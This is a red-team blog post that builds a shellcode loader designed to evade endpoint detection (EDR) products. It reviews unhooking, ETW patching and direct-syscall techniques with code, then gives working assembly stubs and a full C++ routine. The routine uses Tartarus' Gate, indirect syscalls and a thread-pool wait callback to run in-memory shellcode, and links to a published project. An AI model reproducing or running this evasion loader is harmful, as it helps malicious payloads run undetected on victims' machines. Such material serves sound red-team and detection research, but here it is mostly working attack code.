As Red Teamers, we need an OPSEC-safe method to execute shellcode via a range of initial access vectors. This keeps getting harder as Endpoint Detection and Response (EDR) products improve, making it more challenging to land an implant.

This post presents a slight variation on a known method for bypassing EDR, commonly known as CreateThreadPoolWait. Instead of going through kernel32.dll, we will call the underlying functions in ntdll.dll.

GitHub:

The loader published above uses the bypass technique introduced in this article.

As Red Teamers, we need to consider which detection mechanisms EDR solutions use in order to build a loader that evades them. The main sources of telemetry that EDRs have at their disposal are:

  • User mode hooking against multiple APIs
  • EtwTi (ETW Threat Intelligence) for telemetry on specific actions, such as allocating executable pages
  • ETW / AMSI event telemetry
  • Kernel Callbacks
  • Minifilter driver

Let’s review some of the choices often used by loaders.

  • Bad OPSEC #1 – Strings that hint at malicious actions
  • Bad OPSEC #2 – Unhooking
  • Bad OPSEC #3 – Private bytes (Patching)
  • Bad OPSEC #4 – Hell’s Gate

Some of the above are going to be addressed below, whilst others are left as an exercise for the reader.

Bad OPSEC #1 – Strings

There are multiple ways to approach hiding strings in binaries. In general, the most common sources of telltale strings in malicious binaries are the names of the DLLs they load and of the exported functions they resolve.

We’re not going to focus too much on this issue here, but strings can often be obfuscated through encoding or encryption. Another method, used more and more recently, is to store only a hash of each string and compare it at run time against the hashes of candidate names, which is ideal for API resolving and DLL loading.
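The hashing idea can be sketched in a few lines. This is a minimal illustration, assuming the well-known djb2 hash; the helper names and the string "ExampleFunction" are hypothetical and are not taken from the published loader.

```cpp
#include <cstdint>

// djb2 string hash. Being constexpr, it can be evaluated at compile time
// for literals, so only the numeric hash needs to be stored.
constexpr std::uint32_t djb2(const char* text) {
    std::uint32_t hash = 5381;
    while (*text != '\0') {
        hash = hash * 33u + static_cast<unsigned char>(*text);
        ++text;
    }
    return hash;
}

// Hypothetical name, used purely for illustration.
constexpr std::uint32_t kWantedHash = djb2("ExampleFunction");

// Returns true when a name read at run time hashes to the stored constant.
inline bool is_wanted(const char* candidate) {
    return djb2(candidate) == kWantedHash;
}
```

A 32-bit hash can collide, so two different names may produce the same value. The same property is what lets analysts recover the original names by hashing a list of known exports.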

Bad OPSEC #2 – Unhooking

Avoiding the user-space hooks placed by EDRs is a huge subject.

It is worth mentioning that Microsoft is not a fan of EDR companies hooking all these functions since there are other ways to approach obtaining telemetry, rather than performing shady hooks in DLLs. Some of the more effective and advanced EDRs do not hook any DLLs, such as Microsoft Defender for Endpoint or Elastic.

Let’s look at the techniques threat actors most commonly use and where they fall short. Many public loaders unhook by loading a second copy of NTDLL (which is an IOC by itself), changing the protection of the main NTDLL to RWX via VirtualProtect, overwriting the hooked section of the main NTDLL with the clean one from the second copy, and then calling VirtualProtect again to restore the original permissions.

Unfortunately, the method explained above carries many IOCs. In addition, much of the code we reviewed had simply copied the snippet below for unhooking.

GetModuleInformation(process, ntdllModule, &mi, sizeof(mi));
LPVOID ntdllBase = (LPVOID)mi.lpBaseOfDll;
HANDLE ntdllFile = CreateFileA("c:\\windows\\system32\\ntdll.dll", GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
HANDLE ntdllMapping = CreateFileMapping(ntdllFile, NULL, PAGE_READONLY | SEC_IMAGE, 0, 0, NULL);
LPVOID ntdllMappingAddress = MapViewOfFile(ntdllMapping, FILE_MAP_READ, 0, 0, 0);

PIMAGE_NT_HEADERS hookedNtHeader = (PIMAGE_NT_HEADERS)((DWORD_PTR)ntdllBase + hookedDosHeader->e_lfanew);

for (WORD i = 0; i < hookedNtHeader->FileHeader.NumberOfSections; i++) {
    if (!strcmp((char*)hookedSectionHeader->Name, (char*)".text")) {
        DWORD oldProtection = 0;
        bool isProtected = VirtualProtect((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)hookedSectionHeader->VirtualAddress), hookedSectionHeader->Misc.VirtualSize, PAGE_EXECUTE_READWRITE, &oldProtection);
        memcpy((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)hookedSectionHeader->VirtualAddress), (LPVOID)((DWORD_PTR)ntdllMappingAddress + (DWORD_PTR)hookedSectionHeader->VirtualAddress), hookedSectionHeader->Misc.VirtualSize);
        isProtected = VirtualProtect((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)hookedSectionHeader->VirtualAddress), hookedSectionHeader->Misc.VirtualSize, oldProtection, &oldProtection);


Most people, however, do not realize that there is a mistake at the end of this code: CloseHandle(ntdllMapping) only closes the handle to the mapping object and does not remove the second copy of NTDLL, whose view stays mapped in the process.

The use of FreeLibrary is also a mistake, since it tries to free the main NTDLL, which is not possible due to the way Windows processes work. Effectively, the process ends up with two copies of NTDLL loaded, which, in the eyes of an experienced threat hunter or an EDR solution, most likely hints at a malicious process.

Bad OPSEC #3 – Private bytes (Patching)

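“Private bytes” IOCs usually appear when a loader unhooks a DLL. Image pages are normally shared and backed by the file on disk, so writing to them (as in the previous example, where a section of NTDLL is copied from the second copy over the first) turns them into private, modified pages that no longer match the file.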

Threat actors also patch in other situations, for example against ETW and AMSI. The method is similar to NTDLL unhooking, but instead of replacing a whole section, threat actors do the same thing EDRs do: they insert a set of instructions at the beginning of the AMSI or ETW function so that it returns (exits) immediately.

The code below patches the ETW function EtwEventWrite; AMSI’s exported function, AmsiScanBuffer, is typically patched in the same way. It is clear that the exact same IOCs exist as in the previous situation.

void patchETW(OUT HANDLE& hProc) {

    void* etwAddr = GetProcAddress(GetModuleHandle(L"ntdll.dll"), "EtwEventWrite");
    char etwPatch[] = { 0xC3 };
    DWORD lpflOldProtect = 0;
    unsigned __int64 memPage = 0x1000;
    void* etwAddr_bk = etwAddr;
    NtProtectVirtualMemory(hProc, (PVOID*)&etwAddr_bk, (PSIZE_T)&memPage, 0x04, &lpflOldProtect);
    NtWriteVirtualMemory(hProc, (LPVOID)etwAddr, (PVOID)etwPatch, sizeof(etwPatch), (SIZE_T*)nullptr);
    NtProtectVirtualMemory(hProc, (PVOID*)&etwAddr_bk, (PSIZE_T)&memPage, lpflOldProtect, &lpflOldProtect);
    std::cout << "[+] Patched etw!\n";


This leaves two memory-protection changes (VirtualProtect or, as here, NtProtectVirtualMemory) and the private bytes IOC. There is a way around this, however: HWBP (hardware breakpoint) hooking of those functions. A hardware breakpoint is set on the function without modifying its bytes, and when the function is called, a handler replaces its behaviour with a different one, such as returning immediately from AmsiScanBuffer.

A public proof-of-concept for this method can be found here.

Bad OPSEC #4 – Hell’s Gate Direct Syscalls

Hell’s Gate is an excellent technique that manually walks NTDLL, finds the syscall IDs, and creates a stub that issues the syscall from our own process.

When this technique was first released it worked well, because it reads each syscall ID straight from the function’s stub in NTDLL. A number of products now hook those stubs, however, and when the expected bytes have been overwritten the lookup fails. The technique was therefore developed further in an update called Halo’s Gate, which tackles this issue by performing some extra calculations in NTDLL’s memory, based on neighbouring stubs, to find the syscall ID.
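To make the failure case concrete, here is a minimal sketch of the byte check involved, run against hard-coded sample arrays rather than a live NTDLL. The function name, the sample bytes and the syscall ID 0x18 are assumptions for illustration. This is not the Hell’s Gate source, which performs its own variant of the check.

```cpp
#include <cstddef>
#include <cstdint>

// Reads the syscall ID from the first bytes of an x64 NTDLL-style stub.
// An unhooked stub starts with 4C 8B D1 (mov r10, rcx) followed by
// B8 imm32 (mov eax, <id>). Returns false when the prologue differs,
// for example because an inline hook replaced it with a jmp.
inline bool read_syscall_id(const std::uint8_t* stub, std::size_t len,
                            std::uint32_t& id_out) {
    if (len < 8) return false;
    const bool clean = stub[0] == 0x4C && stub[1] == 0x8B &&
                       stub[2] == 0xD1 && stub[3] == 0xB8;
    if (!clean) return false;
    // The immediate operand is stored little-endian in bytes 4..7.
    id_out = static_cast<std::uint32_t>(stub[4]) |
             (static_cast<std::uint32_t>(stub[5]) << 8) |
             (static_cast<std::uint32_t>(stub[6]) << 16) |
             (static_cast<std::uint32_t>(stub[7]) << 24);
    return true;
}

// Sample data (assumed values): a clean prologue and one overwritten by a jmp.
constexpr std::uint8_t kCleanStub[]  = {0x4C, 0x8B, 0xD1, 0xB8, 0x18, 0x00, 0x00, 0x00};
constexpr std::uint8_t kHookedStub[] = {0xE9, 0x10, 0x20, 0x30, 0x40, 0xCC, 0xCC, 0xCC};
```

The check succeeds on the clean sample and yields 0x18, while the hooked sample is rejected. That rejected case is where the plain lookup stops working and the later variants take over.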

There was one further update, Tartarus’ Gate, released because Halo’s Gate did not handle the hooking method of one specific EDR. These techniques are a great way of avoiding unhooking IOCs, since none of them needs an API such as VirtualProtect or WriteProcessMemory. However, one IOC still exists: direct syscalls.

This is what the stub looks like:

HellDescent PROC
    mov r10, rcx
    mov eax, wSystemCall
    syscall
    ret
HellDescent ENDP

This is an IOC because the syscall instruction executes directly from the loader’s memory space rather than from the loaded NTDLL, which is easy to detect when a stack trace is reviewed.
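From the defender’s side, the check can be as simple as a range comparison. The sketch below assumes a detection that compares the address a syscall returns to against the address range of the loaded NTDLL. The struct, the function names and all addresses are hypothetical, and real products may well apply different or additional logic.

```cpp
#include <cstdint>

// Address range occupied by a loaded module (values are supplied by the caller).
struct ModuleRange {
    std::uint64_t base;
    std::uint64_t size;
};

// True when the address lies inside [base, base + size).
constexpr bool address_in_module(std::uint64_t address, ModuleRange module) {
    return address >= module.base && address - module.base < module.size;
}

// A syscall whose return address lies outside NTDLL was not issued from an
// NTDLL stub, which is the pattern a direct syscall produces.
constexpr bool looks_like_direct_syscall(std::uint64_t syscall_return_address,
                                         ModuleRange ntdll) {
    return !address_in_module(syscall_return_address, ntdll);
}
```

With a hypothetical NTDLL mapped at 0x7FF800000000 and 0x200000 bytes long, a return address of 0x7FF800001012 passes the check, whereas an address in a private allocation such as 0x1F000001000 is flagged.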

The loader presented below tackles this issue by using the indirect syscall method, which replaces the syscall instruction in the stub with a JMP to a valid syscall instruction inside NTDLL.

Creating the Loader

The task at hand is to create a loader with as few IOCs as possible and to decide on the injection method. Most EDRs are more lenient towards injections that happen within the same process, which is what this loader does. For simplicity’s sake, the loader will not address AMSI/ETW evasion. It avoids unhooking and uses Tartarus’ Gate instead, together with indirect syscalls. In summary, the loader will use:

  • Tartarus’ Gate
  • Indirect Syscall
  • A new injection method (kind of…)

As previously mentioned, Tartarus’ Gate is used in exactly the same way, but the stub needs to be changed for the indirect syscall, as shown below.

    id DWORD 000h
    jmptofake QWORD 00000000h


    setup PROC
        mov id, 000h
        mov id, ecx
        mov jmptofake, 00000000h
        mov jmptofake, rdx
    setup ENDP

    executioner PROC
        mov r10, rcx
        mov eax, id
        jmp jmptofake
    executioner ENDP

First, the loader needs the memory address of a syscall instruction inside NTDLL. This is easy enough to obtain by resolving a syscall function such as NtAddBootEntry and adding an offset of 18 bytes (0x12), which is where the syscall instruction is located in the function’s stub.
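Where that offset comes from can be checked against the byte layout of a stub. The sketch below uses a hard-coded sample array laid out like an unhooked x64 stub on recent Windows builds. The array, the function name and the ID 0x18 are assumptions for illustration, and older or hooked stubs may be laid out differently.

```cpp
#include <cstddef>
#include <cstdint>

// Returns the offset of the first "syscall; ret" sequence (0F 05 C3) in the
// buffer, or -1 when the sequence is not present.
inline std::ptrdiff_t find_syscall_offset(const std::uint8_t* code, std::size_t len) {
    for (std::size_t i = 0; i + 2 < len; ++i) {
        if (code[i] == 0x0F && code[i + 1] == 0x05 && code[i + 2] == 0xC3) {
            return static_cast<std::ptrdiff_t>(i);
        }
    }
    return -1;
}

// Sample stub bytes (assumed layout; the syscall ID 0x18 is arbitrary).
constexpr std::uint8_t kSampleStub[] = {
    0x4C, 0x8B, 0xD1,                               // mov r10, rcx
    0xB8, 0x18, 0x00, 0x00, 0x00,                   // mov eax, 18h
    0xF6, 0x04, 0x25, 0x08, 0x03, 0xFE, 0x7F, 0x01, // test byte ptr [7FFE0308h], 1
    0x75, 0x03,                                     // jne (to the int 2Eh path)
    0x0F, 0x05,                                     // syscall
    0xC3,                                           // ret
    0xCD, 0x2E,                                     // int 2Eh
    0xC3                                            // ret
};
```

Counting the instruction lengths in the sample gives 3 + 5 + 8 + 2 = 18 bytes before the syscall instruction, which is what the search returns for this array.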

With that address in hand, an NTAPI function is resolved and called as follows.

//Resolving ZwAllocateVirtualMemory
GetSyscallId(hNtdll, &SyscallId, (PCHAR)"ZwAllocateVirtualMemory");
setup(SyscallId, spoofJump);
NTSTATUS status = executioner((HANDLE)-1,&currentVmBase, NULL,&szWmResv,MEM_COMMIT,PAGE_READWRITE);

The GetSyscallId function performs the Tartarus’ Gate checks to find the syscall ID. The setup function in the assembly then stores the ID and the address of the legitimate syscall instruction in memory, so that the syscall stub (the executioner function) executes ZwAllocateVirtualMemory via the legitimate syscall instruction in NTDLL.

The loader uses ZwAllocateVirtualMemory to allocate memory for the shellcode with RW permissions, CopyMemoryEx (a custom memcpy) to write the shellcode into the allocated memory, and NtProtectVirtualMemory to change the permissions of the allocated pages to RX.

The last part is the injection method that will use the functions TpAllocWait, TpSetWait and NtWaitForSingleObject.

This injection is based on the CreateThreadPoolWait callback technique. It starts by using CreateEvent to create an event object in a signalled state, then uses TpAllocWait to create a wait object with the address of the allocated shellcode as its callback function. TpSetWait then associates the wait object with the event, and once the event is signalled (or the wait times out) the thread pool invokes the callback, which executes the shellcode.

int main()
    auto hNtdll = GetModuleHandleA("ntdll.dll");
    DWORD SyscallId = 0;
    LPVOID spoofJump = ((char*)GetProcAddress(hNtdll, "NtAddBootEntry")) + 18; //Fetching the Syscall instruction address
    HANDLE c = CreateEventA(NULL, FALSE, TRUE, NULL);

    LPVOID currentVmBase = NULL;
    SIZE_T szWmResv = sizeof(buf);
    //Resolving ZwAllocateVirtualMemory
    GetSyscallId(hNtdll, &SyscallId, (PCHAR)"ZwAllocateVirtualMemory");
    setup(SyscallId, spoofJump);
    NTSTATUS status = executioner((HANDLE)-1,&currentVmBase, NULL,&szWmResv,MEM_COMMIT,PAGE_READWRITE);
    //Allocating space in memory for shellcode

    CopyMemoryEx(currentVmBase, buf, szWmResv);
    //Avoiding hooks with custom copying on current process

    //Resolving NtProtectVirtualMemory
    DWORD oldProt;
    GetSyscallId(hNtdll, &SyscallId, (PCHAR)"NtProtectVirtualMemory");
    setup(SyscallId, spoofJump);
    status = executioner((HANDLE)-1,&currentVmBase, &szWmResv,PAGE_EXECUTE_READ,&oldProt);

    //Resolving TpAllocWait
    HANDLE hThread = NULL;
    pTpAllocWait TpAllocWait = (pTpAllocWait)GetProcAddress(hNtdll, "TpAllocWait");
    status = TpAllocWait((TP_WAIT**)&hThread, (PTP_WAIT_CALLBACK)currentVmBase, NULL, NULL);

    //Resolving TpSetWait
    pTpSetWait TpSetWait = (pTpSetWait)GetProcAddress(hNtdll, "TpSetWait");
    TpSetWait((TP_WAIT*)hThread, c, NULL);

    //Resolving NtWaitForSingleObject
    GetSyscallId(hNtdll, &SyscallId, (PCHAR)"NtWaitForSingleObject");
    setup(SyscallId, spoofJump);
    status = executioner(c, 0, NULL);

Obviously, the above code generates an EXE, which is not recommended for use, but it can easily be turned into a DLL or adapted to a different execution vector. The full project has been published below.

GitHub:

There is one more IOC in this execution method: since the shellcode lives only in memory, the thread will appear to execute from an unbacked address (an address that does not map to a file on disk), which is suspicious. Working around this is left as an exercise for the reader.